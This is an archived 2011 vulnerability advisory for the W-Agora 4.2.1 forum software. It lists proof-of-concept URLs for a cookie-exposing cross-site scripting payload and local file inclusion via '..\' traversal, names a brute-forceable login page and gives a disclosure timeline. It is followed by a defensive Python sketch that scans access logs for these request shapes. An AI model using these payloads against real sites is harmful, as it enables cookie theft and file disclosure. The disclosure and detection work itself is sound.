W-Agora 4.2.1 Cross Site Scripting / Local File Inclusion

2011-03-18T00:00:00
ID PACKETSTORM:99458
Type packetstorm
Reporter MustLive
Modified 2011-03-18T00:00:00

Description

                                        
Hello list!  
  
I want to warn you about Cross-Site Scripting, Local File Inclusion and  
Brute Force vulnerabilities in W-Agora.  
  
SecurityVulns ID: 11499.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are W-Agora 4.2.1 and previous versions.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/current/getfile.php/support_howto/%22%3E%3Cbody%20onload=alert(document.cookie)%3E/1/  
  
Local File Inclusion (WASC-31):  
  
In folder conf:  
  
http://site/current/getfile.php/1  
  
http://site/current/index.php?bn=1  
  
http://site/current/list.php?bn=1  
  
In any folder (only on Windows-servers):  
  
http://site/current/getfile.php/..\1  
  
http://site/current/index.php?bn=..\1  
  
http://site/current/list.php?bn=..\1  
  
Brute Force (WASC-11):  
  
http://site/current/login.php  
  
------------  
Timeline:  
------------  
  
2011.01.15 - announced at my site.  
2011.01.16 - informed developers.  
2011.01.23 - developer answered and promised to try to fix all holes, which  
I informed him about in 2010-2011.  
2011.01.24 - gave additional suggestions to the developer.  
2011.03.16 - disclosed at my site.  
  
I mentioned these vulnerabilities on my site  
(http://websecurity.com.ua/4845/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
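
For defenders, the XSS and Local File Inclusion request shapes listed in this advisory can be searched for in web server access logs. The Python sketch below is an added example, not part of the advisory or of W-Agora's code. The `known_forums` allow-list, the treatment of `support_howto` as a valid forum name, the sample log lines, and the assumption that the first path segment after `getfile.php` plays the same role as `bn` are all constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

MARKUP = re.compile(r'[<>"]')         # characters the XSS request injects
TRAVERSAL = re.compile(r"\.\.[\\/]")  # ..\ from the advisory, ../ for completeness
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode(value, rounds=3):
    """Percent-decode `rounds` times so double-encoded input is also seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target, known_forums):
    """Label one request target; known_forums is an assumed allow-list of forum names."""
    parts = urlsplit(target)
    head, sep, path_info = parts.path.partition(".php")
    if not sep:
        return []
    script = head.rsplit("/", 1)[-1] + sep
    findings, values = set(), []
    if script == "getfile.php" and path_info.strip("/"):
        raw = decode(path_info).lstrip("/")
        if MARKUP.search(raw):
            findings.add("xss-pathinfo")
        values.append((raw, raw.split("/", 1)[0]))
    elif script in ("index.php", "list.php"):
        values += [(decode(v),) * 2 for v in parse_qs(parts.query).get("bn", [])]
    for raw, name in values:
        if TRAVERSAL.search(raw):
            findings.add("traversal")
        elif name not in known_forums:
            findings.add("unknown-forum")
    return sorted(findings)

def scan(log_lines, known_forums):
    """Yield (target, findings) for access-log lines with at least one finding."""
    for line in log_lines:
        m = REQUEST.search(line)
        if m and (hits := classify(m.group(1), known_forums)):
            yield m.group(1), hits

# Constructed sample lines (not real traffic), combined log format
SAMPLE = [
    '198.51.100.7 - - [18/Mar/2011:10:00:01 +0000] "GET /current/index.php?bn=support_howto HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Mar/2011:10:00:02 +0000] "GET /current/list.php?bn=..%5C1 HTTP/1.1" 200 312',
    '198.51.100.7 - - [18/Mar/2011:10:00:03 +0000] "GET /current/getfile.php/1 HTTP/1.1" 200 298',
]
```

The `unknown-forum` label only means the value is not in the allow-list supplied by the operator, so it is a prompt for review rather than proof of an inclusion attempt.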
  